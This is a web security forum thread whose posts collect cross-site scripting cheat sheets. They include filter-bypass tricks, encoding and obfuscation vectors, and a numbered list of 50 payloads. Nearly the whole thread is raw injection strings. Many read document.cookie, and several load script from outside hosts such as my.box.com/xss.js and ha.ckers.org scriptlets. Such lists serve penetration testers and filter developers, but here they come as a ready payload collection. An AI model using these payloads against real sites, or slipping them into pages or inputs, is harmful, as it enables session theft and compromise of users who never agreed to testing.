Results 1 to 6 of 6

Thread: XSS Cheat Sheets Share/Save - My123World.Com!

  1. #1
    Infosec Enthusiast AnArKI's Avatar
    Join Date
    Jul 2010
    Location
    London
    Posts
    514
    Blog Entries
    2

    XSS Cheat Sheets

    Please post all XSS Cheat Sheets here

  2. #2
    Infosec Enthusiast AnArKI's Avatar
    Join Date
    Jul 2010
    Location
    London
    Posts
    514
    Blog Entries
    2
    Basic ones

    Code:
    “><script >alert(document.cookie)</script>
    
    
    Bypass filter when it strips <script> tags:
    
    
    %253cscript%253ealert(document.cookie)%253c/script%253e
    
    “><s”%2b”cript>alert(document.cookie)</script>
    
    “><ScRiPt>alert(document.cookie)</script>
    
    “><<script>alert(document.cookie);//<</script>
    
    foo%00<script>alert(document.cookie)</script>
    
    <scr<script>ipt>alert(document.cookie)</scr</script>ipt>
    
    %22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E
    
    
    When inside <script> tags:
    
    ‘; alert(document.cookie); var foo=’
    
    foo\’; alert(document.cookie);//’;
    
    </script><script >alert(document.cookie)</script>
    
    
    Other XSS that don’t require <script>:
    
    <img src=asdf onerror=alert(document.cookie)>
    
    <BODY ONLOAD=alert(’XSS’)>
    Last edited by fb1h2s; 10-01-2010 at 03:56 PM.

  3. #3
    Security Researcher fb1h2s's Avatar
    Join Date
    Jul 2010
    Location
    India
    Posts
    616
    Blog Entries
    32
    Code:
    <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
    <IMG SRC="jav	ascript:alert('XSS');">
    <IMG SRC="jav&#x0D;ascript:alert('XSS');">
    <IMG SRC="   javascript:alert('XSS');">
    <iframe src=http://ha.ckers.org/scriptlet.html <
    <SCRIPT SRC=//ha.ckers.org/.j>
    <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
    <BODY BACKGROUND="javascript:alert('XSS')">
    <BODY ONLOAD=alert('XSS')>
    <IMG DYNSRC="javascript:alert('XSS')">
    <LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
    </TITLE><SCRIPT>alert("XSS");</SCRIPT>
    <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
    <IMG LOWSRC="javascript:alert('XSS')">
    <BR SIZE="&{alert('XSS')}">
    <LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
    <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
    Hacking Is a Matter of Time Knowledge and Patience

  4. #4
    Web Security Consultant amolnaik4's Avatar
    Join Date
    Jul 2011
    Location
    webr00t
    Posts
    277
    Blog Entries
    4

    Advanced XSS payloads

    There is a xss challenge created by .mario. The challenge was to get cookie access with javascript. This challenge can be found here:

    Code:
    hxxp://html5sec.org/xssme/xssme2
    The bypasses submitted by many researchers are listed here:

    Code:
    hxxp://html5sec.org/xssme/bypasses
    These are the list of advanced XSS payloads with many techniques. This can be very useful for many application security testers as advanced xss cheat sheet.

    Cheers,
    AMol NAik
    Last edited by amolnaik4; 12-07-2011 at 10:44 AM.

  5. #5
    ha.ckers.org/xss.html
    i dont think that there exists any better XSS cheatsheet in this whole world.
    however it dosent have much obfuscated injections, so that could be added here.

  6. #6
    Infosec Enthusiast AnArKI's Avatar
    Join Date
    Jul 2010
    Location
    London
    Posts
    514
    Blog Entries
    2

    50 Awesome XSS cheat sheets from Ashar Javed

    Code:
    1) <a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>
     
    2) <div onmouseover='alert&lpar;1&rpar;'>DIV</div>
     
    3) <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
     
    4) <a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>
     
    5) <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> ​
     
    6) <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">​
     
    7) <var onmouseover="prompt(1)">On Mouse Over</var>​
     
    8) <a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>
     
    9) <img src="/" =_=" title="onerror='prompt(1)'">
     
    10) <%<!--'%><script>alert(1);</script -->
     
    11) <script src="data:text/javascript,alert(1)"></script>
     
    12) <iframe/src \/\/onload = prompt(1)
     
    13) <iframe/onreadystatechange=alert(1)
     
    14) <svg/onload=alert(1)
     
    15) <input value=<><iframe/src=javascript:confirm(1)
     
    16) <input type="text" value=``<div/onmouseover='alert(1)'>X</div>
     
    17) http://www.<script>alert(1)</script .com
     
     
    18) <iframe  src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe> ​
     
    19) <svg><script ?>alert(1)
     
    20) <iframe  src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
     
    21) <img src=`xx:xx`onerror=alert(1)>
     
    22) <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
     
    23) <meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>​
     
    24) <math><a xlink:href="//jsfiddle.net/t846h/">click
     
    25) <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>​
     
    26) <svg contentScriptType=text/vbs><script>MsgBox+1
     
    27) <a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a
     
    28) <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
     
    29) <script>~'\u0061' ;  \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073.  \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
     
    30) <script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
     
    31)  <script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script ​​​​​​​​​​​​
     
    32) <object data=javascript&colon;\u0061&#x6C;&#101%72t(1)>
     
    33) <script>+-+-1-+-+alert(1)</script>
     
    34) <body/onload=&lt;!--&gt;&#10alert(1)>
     
    35) <script itworksinallbrowsers>/*<script* */alert(1)</script ​
     
    36) <img src ?itworksonchrome?\/onerror = alert(1)​​​
     
    37) <svg><script>//&NewLine;confirm(1);</script </svg>
     
    38) <svg><script onlypossibleinopera:-)> alert(1)
     
    39) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa  aaaaaaaaa aaaaaaaaaa  href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe
     
    40) <script x> alert(1) </script 1=2
     
    41) <div/onmouseover='alert(1)'> style="x:">
     
    42)  <--`<img/src=` onerror=alert(1)> --!>
     
    43)  <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script> ​
     
    44) <div  style="position:absolute;top:0;left:0;width:100%;height:100%"  onmouseover="prompt(1)" onclick="alert(1)">x</button>​
     
    45) "><img src=x onerror=window.open('https://www.google.com/');>
     
    46) <form><button formaction=javascript&colon;alert(1)>CLICKME
     
    47) <math><a xlink:href="//jsfiddle.net/t846h/">click
     
    48) <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>​
     
    49) <iframe  src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
     
              50) <a  href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click  Me</a>
    Source:50 awesome XSS vectors that I have tweeted (@soaj1664ashar) over time. Enjoy! No - Pastebin.com

    Credits:Ashar Javed

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •